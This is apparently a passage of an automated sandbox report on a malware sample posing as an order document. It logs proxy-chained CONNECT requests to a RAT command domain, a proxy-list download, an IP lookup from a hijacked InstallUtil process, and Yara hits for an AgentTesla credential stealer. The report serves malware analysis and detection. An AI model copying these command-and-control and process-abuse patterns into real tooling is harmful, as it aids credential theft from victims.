                                                                                        2018192.168.2.955222196.20.125.12980837672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:54.277479887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2019192.168.2.954811167.86.69.142422147672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:54.280961037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.445152998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:00.509298086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:06.648379087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:18.741880894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:30.745349884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2020192.168.2.954653208.109.14.49505407672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:54.283847094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2021192.168.2.95472445.11.95.16550457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:54.293302059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.561213017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.242100954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2022192.168.2.954697162.223.89.84807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:54.305208921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.591964960 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:54 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2023192.168.2.954618179.60.243.37486997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:54.305731058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.949714140.82.114.34437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-03-11 15:16:37 UTC101OUTGET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1
                                                                                        Host: github.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-03-11 15:16:37 UTC506INHTTP/1.1 200 OK
                                                                                        Server: GitHub.com
                                                                                        Date: Mon, 11 Mar 2024 15:16:37 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                        ETag: W/"494da64c5319a90cc35a7db3b4ac5258"
                                                                                        Cache-Control: max-age=0, private, must-revalidate
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                        X-Frame-Options: deny
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 0
                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                        2024-03-11 15:16:37 UTC3595INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                        2024-03-11 15:16:37 UTC21INData Raw: 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                        Data Ascii: connection: close
                                                                                        2024-03-11 15:16:37 UTC1370INData Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72
                                                                                        Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
                                                                                        2024-03-11 15:16:37 UTC1370INData Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                        Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
                                                                                        2024-03-11 15:16:37 UTC1370INData Raw: 67 69 74 68 75 62 2d 66 34 64 38 35 37 63 62 63 39 36 61 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73
                                                                                        Data Ascii: github-f4d857cbc96a.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
                                                                                        2024-03-11 15:16:37 UTC1370INData Raw: 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69
                                                                                        Data Ascii: ps://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://gi
                                                                                        2024-03-11 15:16:37 UTC1370INData Raw: 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72
                                                                                        Data Ascii: " defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer
                                                                                        2024-03-11 15:16:37 UTC1370INData Raw: 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 38 35 37 34 35 33 30 61 36 63 64 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f
                                                                                        Data Ascii: fer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-8574530a6cd5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendo
                                                                                        2024-03-11 15:16:38 UTC1370INData Raw: 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 37 32 63 39 66 62 64 65 35 61 64 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78
                                                                                        Data Ascii: ert_index_js-72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index
                                                                                        2024-03-11 15:16:38 UTC1370INData Raw: 62 5f 62 65 68 61 76 69 6f 72 73 5f 69 6e 63 6c 75 64 65 2d 34 36 37 37 35 34 2d 66 39 62 64 34 33 33 65 39 35 39 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f
                                                                                        Data Ascii: b_behaviors_include-467754-f9bd433e9591.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.950694222.255.238.1594437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-03-11 15:16:41 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        2024-03-11 15:16:42 UTC192INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 613
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        2024-03-11 15:16:42 UTC613INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.954245172.67.140.874437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-03-11 15:16:45 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        2024-03-11 15:16:46 UTC161INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        2024-03-11 15:16:46 UTC155INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.955228172.67.74.15244342472C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-03-11 15:16:54 UTC155OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                        Host: api.ipify.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-03-11 15:16:55 UTC211INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:55 GMT
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 13
                                                                                        Connection: close
                                                                                        Vary: Origin
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 862c8223b83509f7-LAS
                                                                                        2024-03-11 15:16:55 UTC13INData Raw: 31 35 34 2e 31 36 2e 31 30 35 2e 33 38
                                                                                        Data Ascii: 154.16.105.38


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:16:16:15
                                                                                        Start date:11/03/2024
                                                                                        Path:C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        Imagebase:0x2ad23480000
                                                                                        File size:41'472 bytes
                                                                                        MD5 hash:AB245CB90A4667DB2C06CC8E0B1096B6
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Target ID:6
                                                                                        Start time:16:16:51
                                                                                        Start date:11/03/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        Wow64 process (32bit):
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                                        Imagebase:
                                                                                        File size:262'432 bytes
                                                                                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                        Target ID:7
                                                                                        Start time:16:16:52
                                                                                        Start date:11/03/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                                                                                        Imagebase:0xce0000
                                                                                        File size:42'064 bytes
                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2587711713.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2587711713.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2590372149.000000000301C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
